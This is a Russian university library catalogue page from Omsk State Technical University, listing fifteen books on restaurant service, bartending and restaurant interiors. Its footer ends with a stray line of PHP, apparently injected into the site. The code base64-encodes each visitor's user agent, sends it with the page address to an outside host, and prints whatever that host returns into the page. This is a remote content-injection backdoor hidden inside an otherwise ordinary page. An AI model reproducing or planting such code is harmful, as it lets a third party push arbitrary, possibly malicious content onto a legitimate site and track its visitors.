Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

137 пользователей


Зарегистрированных: 1 

Зарыпова Марзия Альфрусовна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ИНТЕРЬЕР РЕСТОРАНА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 15
1. 
Радченко Л. А. Обслуживание на предприятиях общественного питания [Текст] : учеб. пособие для студентов образоват. учреждений сред. проф. образования / Л. А. Радченко, 2010. - 318 с.
Держатели документа (Информация об экземплярах) 
2. 
Обслуживание на предприятиях общественного питания [Текст] : учеб. пособие для колледжей и проф.-техн. лицеев, уч-щ / сост. Л. А. Радченко, 2001. - 372 с.
3. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] / В. В. Усов, 2011. - 432 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- Машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- БАНКЕТ КОМБИНИРОВАННЫЙ -- БАНКЕТ С ЧАСТИЧНЫМ ОБСЛУЖИВАНИЕМ -- КЕЙТЕРИНГ
Держатели документа (Информация об экземплярах) 
4. 
Радченко Л. А. Обслуживание на предприятиях общественного питания [Текст] / Л. А. Радченко, 2013. - 318 с.
Держатели документа (Информация об экземплярах) 
5. 
Коршунов Н. В. Современный ресторан и культура обслуживания [Текст] / Н. В. Коршунов, 1968. - 183 с.
Ключевые слова 
ИНТЕРЬЕР РЕСТОРАНА -- ВЕНТИЛЯЦИЯ РЕСТОРАНА -- ОСВЕЩЕНИЕ РЕСТОРАНА -- ОБОРУДОВАНИЕ РЕСТОРАНА -- БЕЛЬЕ СТОЛОВОЕ -- ПОСУДА -- ОФИЦИАНТ - ПРАВИЛА РАБОТЫ -- РЕСТОРАН - ОБСЛУЖИВАНИЕ -- ВСТРЕЧА ПОСЕТИТЕЛЕЙ -- ПРИЕМ ЗАКАЗА -- ВЫПОЛНЕНИЕ ЗАКАЗА -- РАСЧЕТ С ПОСЕТИТЕЛЯМИ -- ОБСЛУЖИВАНИЕ ФОРУМОВ -- ОБСЛУЖИВАНИЕ ФЕСТИВАЛЕЙ -- ОБСЛУЖИВАНИЕ СИМПОЗИУМОВ -- РЕСТОРАН - ГОСТИНИЦА -- ОБСЛУЖИВАНИЕ БАНКЕТНОЕ -- СЕРВИРОВКА СТОЛА -- ОБСЛУЖИВАНИЕ ГОСТЕЙ -- ПРАВИЛА ПОВЕДЕНИЯ ЗА СТОЛОМ -- ЗАКУСКА -- БЛЮДА ПЕРВЫЕ -- БЛЮДА ВТОРЫЕ -- БЛЮДА ГОРЯЧИЕ -- БЛЮДА СЛАДКИЕ -- ПОДАЧА КОФЕ -- ПОДБОР ВИН -- ВИНО -- ВОДА МИНЕРАЛЬНАЯ -- ПИВО -- КОКТЕЙЛИ
Держатели документа (Информация об экземплярах) 
6. 
Официант-бармен [Текст] / сост. В. А. Барановский, 2013. - 427 с.
Ключевые слова 
ОФИЦИАНТ - БАРМЕН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- РЕСТОРАН -- КАФЕ -- БАР -- ПРОЦЕСС ТЕХНОЛОГИЧЕСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- ОБОРУДОВАНИЕ ЗАЛА -- БУФЕТ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- ОБСЛУЖИВАНИЕ ПОСЕТИТЕЛЕЙ -- КУЛЬТУРА ПОВЕДЕНИЯ ОФИЦИАНТА -- ВСТРЕЧА ПОСЕТИТЕЛЕЙ -- ПРИЕМ ЗАКАЗА -- ПОДАЧА БЛЮД -- КОКТЕЙЛЬ -- ПУНШ -- ГЛИНТВЕЙН -- ГРОГ -- КРЮШОН -- САНГРИЯ -- РАСЧЕТ С ПОСЕТИТЕЛЯМИ -- СПЕЦОБСЛУЖИВАНИЕ -- ОБСЛУЖИВАНИЕ БАНКЕТНОЕ -- БАНКЕТ -- БАНКЕТ С ЧАСТИЧНЫМ ОБСЛУЖИВАНИЕМ -- БАНКЕТ - ЧАЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ АЛЖИРСКАЯ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ КАНАДСКАЯ -- КУХНЯ АРАБСКАЯ -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- КУХНЯ ИНДОНЕЗИЙСКАЯ -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- ТЕХНИКА БЕЗОПАСНОСТИ - ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- ПОДГОТОВКА ПРОФЕССИОНАЛЬНАЯ -- ЭКЗАМЕН ТЕОРЕТИЧЕСКИЙ -- ЭКЗАМЕН ПРАКТИЧЕСКИЙ -- ОХРАНА ТРУДА -- САНПИН 2.3.2.1078-01 -- САНПИН 2.3.5.021-94 -- САНПИН 42-123-4117-86
Держатели документа (Информация об экземплярах) 
7. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] : учеб. пособие для образоват. учреждений нач. проф. образования / В. В. Усов, 2007. - 415 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- Машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- ПРИЕМ -- ПИТАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕКЛАМА - Ресторан -- УСЛУГИ ресторанные -- ОХРАНА ТРУДА -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
8. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] : учеб. для образоват. учреждений нач. проф. образования / В. В. Усов, 2006. - 415 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- Машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- ПРИЕМ -- ПИТАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕКЛАМА - Ресторан -- УСЛУГИ ресторанные -- ОХРАНА ТРУДА -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
9. 
Официант-бармен от А до Я [Текст] : справочное издание, 2002. - 223 с.
Ключевые слова 
РЕСТОРАН -- Кафе -- БАР -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСО-РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- Раздаточная -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ИНТЕРЬЕР РЕСТОРАНА -- ОБОРУДОВАНИЕ ЗАЛА РЕСТОРАНА -- БУФЕТ -- Касса -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ- прием -- БАНКЕТ - ЧАЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БУФЕТ-бар -- ОБСЛУЖИВАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕСТОРАН - реклама -- общепит - охрана труда -- ТЕХНИКА БЕЗОПАСНОСТИ -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
10. 
Радченко Л. А. Обслуживание на предприятиях общественного питания [Текст] : Учеб. пособие для колледжей, проф. уч-щ и лицеев / Л. А. Радченко, 2003. - 372 с.
Держатели документа (Информация об экземплярах) 
11. 
Барановский В. А. Официант-бармен [Текст] : учеб. пособие для учащихся учеб. заведений начального проф. образования / В. А. Барановский, Л. В. Кулькова, 2002. - 347 с.
Ключевые слова 
ОФИЦИАНТ-бармен -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- БУФЕТ -- БАР -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА СТОЛА -- КУЛЬТУРА ПОВЕДЕНИЯ официанта -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ- ПРИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- БУФЕТ бар -- Банкет с частичным обслуживанием -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ алжирская -- Кухня английская -- Кухня американская -- Кухня канадская -- Кухня арабская -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- ОХРАНА ТРУДА
12. 
Пикалев А. В. Как увеличить доход ресторана, бара, кафе [Текст] / А. В. Пикалев, А. П. Маевская, 2004. - 161 с.
Держатели документа (Информация об экземплярах) 
13. 
Денисова Н. И. Ресторанный интерьер. Идеи и дизайн. Вып. 3 [Текст] / Н. И. Денисова, 2006. - 191 с.
Держатели документа (Информация об экземплярах) 
14. 
Тэйлор Дж. Д. Рестораны, бары, кафе. Лучшие мировые интерьеры [Текст] : переводное издание / Дж. Д. Тэйлор, 2004. - 191 с.
Держатели документа (Информация об экземплярах) 
15. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] : Учеб. / В. В. Усов, 2002. - 415 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- ПРИЕМ -- ПИТАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕКЛАМА - Ресторан -- УСЛУГИ ресторанные -- ОХРАНА ТРУДА -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3049 - 15.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.69 с.12 запросов, 0.41c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;